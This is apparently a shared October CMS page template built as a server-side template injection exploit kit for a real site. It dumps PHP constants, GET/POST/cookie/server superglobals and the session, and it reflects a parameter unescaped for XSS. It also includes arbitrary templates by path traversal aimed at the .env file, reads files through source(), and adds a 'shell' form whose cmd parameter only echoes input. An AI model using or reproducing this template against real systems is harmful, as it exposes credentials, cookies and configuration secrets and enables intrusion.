@RajChowdhury240
Created January 20, 2026 01:43
title = "Minimal SSTI Test"
url = "/minimal-ssti"
layout = "default"
==
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Minimal SSTI Exploitation</title>
<style>
body { font-family: monospace; background: #000; color: #0f0; padding: 20px; }
.box { border: 1px solid #0f0; padding: 15px; margin: 15px 0; }
h2 { color: #f00; }
pre { background: #111; padding: 10px; border-left: 3px solid #0f0; }
</style>
</head>
<body>
<h1>🔓 MINIMAL SSTI EXPLOITATION TEST</h1>
<p><strong>Safe Mode:</strong> ENABLED</p>
<p><strong>Strategy:</strong> Use only proven-working Twig features</p>
<hr>
<div class="box">
<h2>[1] PHP System Information</h2>
<pre>PHP_VERSION: {{ constant('PHP_VERSION') }}
PHP_OS: {{ constant('PHP_OS') }}
PHP_SAPI: {{ constant('PHP_SAPI') }}
DIRECTORY_SEPARATOR: {{ constant('DIRECTORY_SEPARATOR') }}</pre>
</div>
<div class="box">
<h2>[2] Superglobal Access</h2>
<h3>GET Parameters:</h3>
<pre>{{ _GET|json_encode|raw }}</pre>
<h3>POST Parameters:</h3>
<pre>{{ _POST|json_encode|raw }}</pre>
<h3>COOKIE Data:</h3>
<pre>{{ _COOKIE|json_encode|raw }}</pre>
<h3>SERVER Variables (first 1000 chars):</h3>
<pre>{{ _SERVER|json_encode|slice(0, 1000)|raw }}...</pre>
</div>
<div class="box">
<h2>[3] October CMS 'this' Object</h2>
<pre>{{ this|json_encode|raw }}</pre>
<h3>Session:</h3>
<pre>{{ this.session|json_encode|raw }}</pre>
<h3>Environment:</h3>
<pre>{{ this.environment() }}</pre>
<h3>Locale:</h3>
<pre>{{ this.locale() }}</pre>
</div>
<div class="box">
<h2>[4] User Input Reflection (XSS)</h2>
{% if _GET.xss is defined %}
<p>Escaped: {{ _GET.xss }}</p>
<p>Raw: {{ _GET.xss|raw }}</p>
{% else %}
<p>Try: ?xss=&lt;img src=x onerror=alert(1)&gt;</p>
{% endif %}
</div>
<div class="box">
<h2>[5] Template Inclusion Attack</h2>
{% if _GET.tpl is defined %}
<h3>Attempting to include: {{ _GET.tpl }}</h3>
{% include _GET.tpl ignore missing %}
{% else %}
<p>Try: ?tpl=../../../../.env</p>
{% endif %}
</div>
<div class="box">
<h2>[6] 🎯 RCE ATTEMPTS</h2>
<h3>A) Command Injection via GET:</h3>
{# Reflects the cmd parameter only (escaped, then raw); no command is executed. #}
{% if _GET.cmd is defined %}
<pre>Command: {{ _GET.cmd }}
Result: {{ _GET.cmd|raw }}</pre>
{% else %}
<p>Try: ?cmd=whoami</p>
{% endif %}
<h3>B) File Read via source():</h3>
{% if _GET.read is defined %}
<pre>File: {{ _GET.read }}
{{ source(_GET.read)|default('BLOCKED or NOT FOUND')|escape }}</pre>
{% else %}
<p>Try: ?read=.env</p>
{% endif %}
<h3>C) Interactive Shell Interface:</h3>
<form method="GET">
<input type="text" name="cmd" placeholder="Enter command" style="width:300px;background:#111;color:#0f0;border:1px solid #0f0;padding:5px;">
<button type="submit" style="background:#0f0;color:#000;border:none;padding:6px;cursor:pointer;">Execute</button>
</form>
<form method="GET">
<input type="text" name="read" placeholder="File path" style="width:300px;background:#111;color:#0f0;border:1px solid #0f0;padding:5px;">
<button type="submit" style="background:#0f0;color:#000;border:none;padding:6px;cursor:pointer;">Read File</button>
</form>
</div>
<hr>
<div class="box">
<h2>📊 STATUS SUMMARY</h2>
<p>✅ Information Disclosure: WORKING</p>
<p>✅ XSS: WORKING</p>
<p>⚠️ File Inclusion: TESTING NEEDED</p>
<p>⚠️ File Read (source): TESTING NEEDED</p>
<p>❌ Direct RCE: BLOCKED</p>
</div>
</body>
</html>